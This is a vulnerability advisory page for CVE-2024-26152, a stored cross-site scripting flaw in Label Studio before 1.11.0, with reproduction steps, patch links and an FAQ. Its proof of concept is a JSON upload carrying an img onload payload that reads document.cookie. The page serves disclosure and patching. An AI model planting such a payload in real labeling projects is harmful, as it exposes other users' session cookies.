Vulnerability Description
### Summary On all Label Studio versions prior to 1.11.0, data imported via file upload feature is not properly sanitized prior to being rendered within a [`Choices`](https://labelstud.io/tags/choices) or [`Labels`](https://labelstud.io/tags/labels) tag, resulting in an XSS vulnerability. ### Details Need permission to use the "data import" function. This was reproduced on Label Studio 1.10.1. ### PoC 1. Create a project.  2. Upload a file containing the payload using the "Upload Files" function.   The following are the contents of the files used in the PoC ``` { "data": { "prompt": "labelstudio universe image", "images": [ { "value": "id123#0", "style": "margin: 5px", "html": "<img width='400' src='https://labelstud.io/_astro/images-tab.64279c16_ZaBSvC.avif' onload=alert(document.cookie)>" } ] } } ``` 3. Select the text-to-image generation labeling template of Ranking and scoring   4. Select a task  5. Check that the script is running  ### Impact Malicious scripts can be injected into the code, and when linked with vulnerabilities such as CSRF, it can cause even greater damage. In particular, It can become a source of further attacks, especially when linked to social engineering.
CVSS Score
MEDIUM
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Humansignal | Label Studio | < 1.11.0 |
Related Weaknesses (CWE)
References
- https://github.com/HumanSignal/label-studio/commit/5df9ae3828b98652e9fa290a19f4dPatch
- https://github.com/HumanSignal/label-studio/pull/5232Patch
- https://github.com/HumanSignal/label-studio/releases/tag/1.11.0Release Notes
- https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6xv9-957j-qExploitVendor Advisory
- https://github.com/HumanSignal/label-studio/commit/5df9ae3828b98652e9fa290a19f4dPatch
- https://github.com/HumanSignal/label-studio/pull/5232Patch
- https://github.com/HumanSignal/label-studio/releases/tag/1.11.0Release Notes
- https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6xv9-957j-qExploitVendor Advisory
FAQ
What is CVE-2024-26152?
CVE-2024-26152 is a vulnerability with a CVSS score of 4.7 (MEDIUM). ### Summary On all Label Studio versions prior to 1.11.0, data imported via file upload feature is not properly sanitized prior to being rendered within a [`Choices`](https://labelstud.io/tags/choices...
How severe is CVE-2024-26152?
CVE-2024-26152 has been rated MEDIUM with a CVSS base score of 4.7/10. Review the CVSS metrics above for detailed severity breakdown.
Is there a patch for CVE-2024-26152?
Check the references section above for vendor advisories and patch information. Affected products include: Humansignal Label Studio.